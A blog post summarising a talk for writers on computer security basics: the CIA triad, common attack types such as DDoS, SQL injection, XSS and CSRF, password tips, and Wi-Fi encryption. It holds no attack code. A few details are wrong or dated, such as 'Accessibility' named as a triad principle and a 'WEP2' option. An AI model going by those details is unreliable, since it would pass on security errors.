JT Evans, as well as being a writer, is
a computer security expert who started programming at the age of seven and has
been a Certified Ethical Hacker since 2009. During his June Write Brain talk,
he covered three main topics: how writers should take care of their computers,
computer security basics for writers, and what the bad guys are doing with
computers.
What
the Bad Guys Are Doing with Computers
The bad guys are violating one of three
principles of computer security when they go after someone’s computer:
Confidentiality. For example, sending your personal information without authorization.
Integrity. For example, changing test scores or introducing a virus onto your system.
Accessibility. For example, taking down a website or server.
These are known as the CIA triad of
computer security.
What methods can the bad guys use?
Denial of Service (DOS) or Distributed Denial of
Service (DDOS) attack. This kind of
attack blocks user access of a computer, website, or network. The DOS too
advantage of a particular vulnerability in the Windows 95/ME/XP operating
systems that let a bad guy crash your computer (a division by zero error was
involved). DOS vulnerabilities are mostly closed now. DDOS attacks are a
technique using botnets to send so many requests to a webpage or server that
the server is unable to provide access all the requests--effectively taking
down the webpage or server for a time.
Weak password vulnerabilities. A computer program can guess a lot of passwords
using dictionary files, very quickly. Because a lot of people have easily
guessed passwords (from things like “password” to their spouse’s name), a lot
of people are vulnerable to this kind of attack. Here are some password tips:
Use at least eight characters.
Use a mix of lowercase, uppercase, and symbols whenever possible.
Don’t depend on replacing letters with numbers (as in p@ssw0rd), because those types of replacements are in the programs’ dictionaries now, too.
Don’t use an easily guessed word or code as a password (password, 123456, qwerty, letmein, etc).
Use a phrase that you can easily remember (like a book title) to build a password, using the initial letters of each word in the phrase (e.g., TQBFJOTLD for “The quick brown fox jumps over the lazy dog”).
Don’t use the same password everywhere; in some cases, if a computer or website is hacked, then all the passwords on it are vulnerable (as in the recent LinkedIn hacking). You don’t want your password at your bank to be hacked just because someone hacked into a social networking site, do you?
A good way to store passwords is to have one really good password that you don’t use anywhere else that you save for a GPG-encrypted text file that stores all your other passwords (including user names and websites).
Buffer overflows. When you’re inputting data into a field, if the field is, say, 10
characters long for a phone number, and if the field isn’t protected from someone
typing in too many characters, then the extra information (after the first ten
characters, in our example) can be used to reprogram the software. In the past,
this was the most common way to attack a system; now, with more protection
being developed, it’s moving to #2 after...
SQL injection. Structured Query Language (SQL) is the programming language used in
relational databases. It’s like a buffer overflow in that you type extra
information to force the database to do something it wasn’t supposed to do, but
the techniques are specific to SQL databases.
Social engineering. This is using clever tricks to get people to give you information. If
someone ever asks you for personal
information, and you didn’t initiate the request by asking for something first,
it’s probably social engineering (for example, phishing emails or even fake
antivirus software).
Cross Site Scripting (XSS). This takes over your browser by injecting code into
a website, then letting the website do naughty things to your browser. This can
be used to create a browser-based botnet.
Cross Site Request Forgery (CSRF). This uses HTML to trick your browser into turning one
action into doing a different action instead. For example, if you clicked
anywhere on an Amazon page, a bad guy might use CSRF to force the click to work
on the “Buy now with 1-Click” button instead.
Lack of encryption. An unsecured wireless network can be used to do many things, include
monitoring every action on your desktop. You should use a Virtual Private
Network (VPN) if you have one, if you’re on unsecured wifi, and use Secure
Socket Layer (SSL) (that is, a site that starts with https:// rather than http://)
when possible. Also, when you’re choosing the encryption for your wireless
network, use WPA, rather than the WEP or WEP2 options, which are easily broken.
Network/Host scanning. There are a wealth of tools available that will scan
for vulnerabilities. These are used by both the bad guys and the good guys: the
bad guys to try to break into systems; the good guys to make sure it won’t be
easy to break in. Some examples are nmap, Nessus/OpenVAS, Metasploit, and
kismet.
If you need more information, you can
go to JT’s website, jtevans.net.
If you’d like a copy of his handouts,
click here.
About the Writer:
DeAnna Knippling is a freelance writer, editor, and formatter married to
a Network Administrator, and she was still embarrassed about some of her
personal security practices after hearing JT's talk. Check out her
personal blog at www.DeAnnaKnippling.com
or her small press at www.WonderlandPress.com.